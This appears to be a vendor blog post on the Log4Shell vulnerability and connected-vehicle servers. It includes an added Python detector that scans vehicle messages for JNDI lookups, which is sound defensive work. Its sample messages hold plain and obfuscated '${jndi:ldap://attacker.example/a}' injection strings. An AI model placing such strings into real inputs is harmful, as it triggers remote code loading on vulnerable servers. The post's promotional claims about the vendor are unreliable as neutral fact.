Protecting Vehicles and Automotive Servers from Log4Shell


Lead Cyber Threat Researcher

Four days ago, the cybersecurity world was introduced to Log4Shell, one of the most profound vulnerabilities of 2021. We at Upstream were prepared for this day, with a holistic solution that includes detection capabilities built to flag any attempt to misuse vehicle communications and this vulnerability for malicious ends.

What is the Log4Shell Vulnerability?

Apache Log4j is a Java-based logging library that has made major headlines in recent days. As news and awareness of this threat spread, IT and cybersecurity teams were tasked with mitigating it to protect their companies’ assets, data, and customers.

This vulnerability in Log4j, known as ‘Log4Shell’, was a zero-day vulnerability, now assigned CVE-2021-44228. It allows an attacker to execute arbitrary code on systems that use Log4j to write out log messages. For this reason, the vulnerability scored an alarmingly high 10 out of 10 on the CVSS scale, a score few vulnerabilities have the “honor” of receiving.

On December 9th, a first proof-of-concept exploit for the vulnerability was published on GitHub. It enabled unauthenticated remote code execution, leading to a complete system takeover. The next day, December 10th, use of the exploit was reported, with massive scanning from multiple hosts for servers running versions of Apache Log4j vulnerable to it. This showed not only the potential risk and impact of the vulnerability across industries but also why patching it was so critical.

What’s Log4Shell’s impact on the Automotive industry?

Connected vehicles collect information about every detail throughout the vehicle’s life, communicating with their OEMs’ telematics and application back-end servers. Beyond OEM servers, other services that communicate with vehicles might belong to aftermarket companies including insurance companies, fleets providers, commercial fleets, car rental and leasing companies, and more.

This open channel between the vehicles and the companies’ servers is exactly where they are exposed to the Log4Shell vulnerability.

The servers that communicate with the vehicles are application servers. Ultimately, they read and write data supplied by the vehicle, which makes them vulnerable to injection attacks, just like many other servers.

The Log4Shell vulnerability is an example of a weakness that jeopardizes the security of any automotive-related server, since the data that travels between vehicle and server is collected, stored, and logged over time in different systems and environments. Each of those systems that logs vehicle data with a vulnerable Log4j puts that data at risk from Log4Shell.

By exploiting this connection between vehicles and company servers, threat actors can reach company assets: communicating directly with the telematics data servers gives a path into the back-end infrastructure and internal servers, bypassing many of the security controls in place.

As a matter of fact, this vulnerability can be exploited by inserting a malicious string into a user-input field of an application, such as an infotainment system, that the server then logs.

We already saw in 2019 how an attack that originates at the vehicle interface can affect internal systems. In that incident, a hacker manipulated his Tesla Model 3 by setting a nickname for his car, which led the OEM’s server to expose private vehicle information. He had discovered a stored cross-site scripting (XSS) vulnerability that could have been exploited to obtain, and possibly modify, vehicle information, and he was able to expose some internal Tesla application data.

Figure: Exploiting the vulnerability in different attack vectors.


Upstream’s Holistic Approach to Mitigation and Protection

Upstream’s automotive cybersecurity products and services worked together to deliver a full and immediate response to the disclosure of the Log4Shell vulnerability.

Once an alert was triggered, our researchers analysed the problem and its potential risks. After a thorough but fast evaluation, they worked with our VSOC operations team on protective measures that give our customers early detection and response capabilities.

Upstream’s platform monitors connected vehicle data and its communications with the automotive application servers. The platform secures the data flow and alerts on injection attacks through purpose-built detection capabilities that flag this class of attack.

In light of the disclosure of the Log4Shell vulnerability, our platform’s injection-detection capabilities were extended to cover the Log4Shell exploit in connected automotive data, whether vehicle data or companion-app back-end data. With this Log4Shell detection capability, the Upstream Platform provides early detection of, and response to, any attempt to exploit this communication vector.
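As an added illustration of the kind of injection check such a platform applies to vehicle and companion-app data (example code written here, not Upstream’s own), the following Python scans constructed JSON messages for Log4j JNDI lookups, including lookups hidden behind nested lookups. The field names, message shapes and the attacker.example host are assumptions; detection of this kind complements, and does not replace, patching Log4j.

```python
import json
import re

# Plain form of a Log4j JNDI lookup, e.g. "${jndi:ldap://host/x}" (case-insensitive).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Innermost nested lookups used to hide the "jndi" token: ${lower:J}, ${upper:n}, ${::-d}, ${env:X:-i}.
INNER_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE)

def normalize(value, max_rounds=10):
    """Collapse nested lookups inside-out so an obfuscated lookup resolves to
    the text Log4j would evaluate; bounded so hostile input cannot loop forever."""
    for _ in range(max_rounds):
        new = INNER_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
        if new == value:
            break
        value = new
    return value

def is_jndi_lookup(value):
    """True if a string holds a JNDI lookup, plain or obfuscated."""
    return bool(JNDI_RE.search(value) or JNDI_RE.search(normalize(value)))

def scan_raw(raw):
    """Parse one raw JSON message (unparseable input is scanned as plain text)
    and return the paths of every string field that carries a JNDI lookup."""
    try:
        decoded = json.loads(raw)
    except json.JSONDecodeError:
        decoded = raw
    hits = []
    def walk(node, path):
        if isinstance(node, dict):
            for key, child in node.items():
                walk(child, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for i, child in enumerate(node):
                walk(child, f"{path}[{i}]")
        elif isinstance(node, str) and is_jndi_lookup(node):
            hits.append(path)
    walk(decoded, "")
    return hits

# Constructed sample traffic (not real data): a telematics heartbeat, a vehicle
# nickname update and a companion-app request; the last two carry lookups.
SAMPLE_MESSAGES = [
    '{"vin": "VIN-EXAMPLE-0001", "nickname": "Family car", "odometer_km": 12345}',
    '{"vin": "VIN-EXAMPLE-0002", "nickname": "${jndi:ldap://attacker.example/a}"}',
    '{"headers": {"User-Agent": "${${lower:j}${::-n}di:ldap://attacker.example/a}"}, "body": {"cmd": "lock"}}',
]
```

Running `scan_raw` over each sample yields no hit for the heartbeat, `nickname` for the second message and `headers.User-Agent` for the third; a hit on a free-text vehicle field such as a nickname is exactly the pattern the Tesla incident above involved.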

Thanks to the Upstream Platform, combined with our AutoThreat® Intelligence and VSOC service, many CISOs learned about the patch before they had even heard of the Log4Shell vulnerability.
